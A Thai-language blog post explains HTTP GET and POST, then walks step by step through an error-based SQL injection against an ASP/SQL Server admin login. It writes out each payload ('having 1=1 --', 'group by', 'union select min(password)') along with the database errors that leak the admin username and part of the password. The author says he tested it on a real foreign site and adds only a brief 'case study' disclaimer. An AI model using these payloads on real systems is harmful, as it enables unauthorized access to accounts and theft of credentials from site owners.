หายหน้าหายตาไปซะนานเลยเรา เอาเถอะวันนี้ทุกคนได้มึนกันแน่ กับ วิธีการที่ Hacker ใช้ Hack Admin iD หรือ การขโมยรหัส ID Admin ของเราไปแห่มไอ้นี่แมร่งเลว ช่างมันมันเจาะเราอุด โดยเดิมทีแล้วไอ้วิธีการต่อไปนี้มันป้องกันง่ายจะตายไป แค่คุณอุดช่องโหว่ของเว็บคุณ แต่เอาเหอะ เหตุผลร้อยประการ หรือ อะไรก็ตามแต่ การHack ต่อไปนี้มันง่ายและเป็นที่นิยม สำหรับ Hacker หน้าใหม่อยากลองวิชา นั้นก็คือการ ฉีดคำสั่ง SQL หรือที่เรียกว่า
SQL Injection
นั้นก็คือ การฉีดคำสั่งเข้าเว็บไซต์ มันก็มีคำสั่งที่แสนธรรมดาของภาษา PHP , Javascript นั้นละ แต่ถ้าเอามาใช้แบบผิดๆมันจะบรรลัยต่อผู้อื่นทันที มันจะมีทั้งการ Xss , SQL injection หรืออะไรอีกมากมายอย่างไรก็ตามแต่ ไอ้เรื่องแบบนี้มันเป็นสีเทา มันขึ้นอยู่กับคนใช้ แต่ว่าในปัจจุบันผู้พัฒนาโปรแกรมที่ใจดีขนาดทำโปรแกรม สำเร็จรูป ขึ้นมาทำให้ Hacker บานเยอะกว่าตลาแถวสามเพง
พอละแพล่มมาเยอะละเรามาเข้าเรื่องที่มันมีสาระกันเลย
การ LOGIN นั้นจะมีการส่งข้อมูลแบ่งเป็นสองแบบคือ แบบ POST และ GET
GET และ POST เป็นวิธีที่ต่างกัน แต่เป็นวิธีการส่งข้อมูลให้กับ server ทั้งคู่
โดย ทั่วไป GET ใช้สำหรับเรียกไฟล์หรือทรัพยากรอื่นๆจาก web server โดยสามารถมี parameter ระบุไว้ตามที่ต้องการได้ ในกรณีของการรับข้อมูลจาก form URL ของการ GET
GET คือวิธีการที่ browser ใช้ในการดาว์นโหลดแฟ้มข้อมูล เช่นเอกสาร HTML หรือรูปภาพ และยังสามารถใช้ในการส่งข้อมูลจาก form ได้ด้วย ถ้าหากว่าข้อมูลนั้นไม่มากจนเกินไป(ข้อจำกัดของขนาดข้อมูลขึ้นอยู่กับ browser)
ผล กระทบของการใช้วิธีการ GET คือ browser และ proxy จะสามารถจดจำผลลัพธ์ของการ GET ไว้ใน cache ได้ เพราะฉนั้นในการเรียกใช้โปรแกรมด้วยวิธี GET หลายครั้งอาจจะได้ผลลัพธ์เก่าออกมาก็เป็นได้ ดังนั้นจึงไม่ควรใช้วิธี GET ถ้าหากว่าต้องการที่จะเก็บข้อมูลสำหรับการเรียกใช้โปรแกรมแต่ละครั้งเฉพาะ เป็นครั้งๆไป หรือกับโปรแกรม CGI ที่ต้องการที่จะนำเสนอข้อมูลที่ใหม่(update)เสมอทุกครั้งที่มีการเรียกใช้
โดย ปกติแล้ว POST ใช้สำหรับส่งข้อมูลไปให้ server เพื่อประมวลผล เมื่อ HTML form ส่งออกไปยัง server ด้วยวิธีการ POST ข้อมูลของคุณจะ attach ไปกับส่วนท้ายของข้อมูลร้องขอใช้งานโปรแกรม เวลาใช้งานวิธี POST อาจจะไม่ง่ายและเร็วเท่ากับการใช้วิธี GET แต่สามารถทำงานกับข้อมูลที่สลับซับซ้อนได้ดีกว่า คุณสามารถส่งแฟ้มข้อมูลไปกับวิธีการ POST ได้ด้วยเช่นกัน ขนาดของข้อมูลที่จะส่งจะไม่ถูกจำกัดเหมือนวิธีการ GET
อย่าง ไรก็ตามสำหรับผู้เขียนโปรแกรม CGI แล้ว ทั้งวิธีการ GET และ POST ต่างก็ไม่ยากที่จะใช้งานด้วยกันทั้งคู่ ข้อดีของวิธีการ POST คือ วิธีการ POST ทำให้สามารถส่งข้อมูลได้ไม่จำกัดขนาด และสามารถนับจากโปรแกรม CGI ได้จริงๆว่ามีการเรียกใช้โปรแกรมกี่ครั้ง ส่วนข้อดีสำหรับการใช้วิธี GET ข้อมูลจากการกรอก form ทั้งหมดจะถูกส่งไปเป็น URL เดียว สามารถจะใช้ผ่าน hyperlink หรือ bookmark ได้โดยไม่ต้องกรอกฟอร์มทุกครั้ง
เอาละ ผมจะมาเขียนว่าการ Hack Admin ID นั้นมันทำยังไง ซึ่งผมTest ไปแล้ว นั้นก็คือ เว็บของนอก (กลัวโดนจับวุ้ย)
1) ลองใส่ username = ' having 1=1 -- , password = .
พอกด submit ปุ๊บตัว app มันก็จะฟ้อง error กลัีบมาแบบนี้
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'login.pwd'; is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /admin/login.asp, line 27
3) ที่นี้ลองใส่ ' group by login.pwd having 1=1 -- พอกด enter ปุ๊ปก็จะได้
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'login.username'; is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /admin/login.asp, line 27
4) ที่นี้ลองใส่ ' union select min(username),1,1,1,1 from login where username > 'a'--
ถ้าไม่รู้ว่าตัวเลขคืออะไรลองไปอ่าน SQL ดูละกัน
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'adminboard' to a column of data type int.
/admin/login.asp, line 27
ต่อไปก็ต้องหา password ให้เจอ!
5) 'union select min(password),1,1,1,1 from login where username = 'adminboard''--
[code]
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'arS%
ยังไงก็ตามแต่ การที่พวก Hacker ใช้ Hack มันไม่ได้มีแค่วิธีเดียว ส่วนเรื่องที่ผมสอนนี้ เอาไว้เป็นกรณีศึกษานะครับ อย่าทะลึ่งเอาไป Hack ชาวบ้านเขานะครับ ขีเกียจรับผิดชอบ
ความคิดเห็น
แต่ไม่คิดจะทำหรอกฮ่าๆ ความสามารถไม่ถึง
ขอบคุณคะ ^^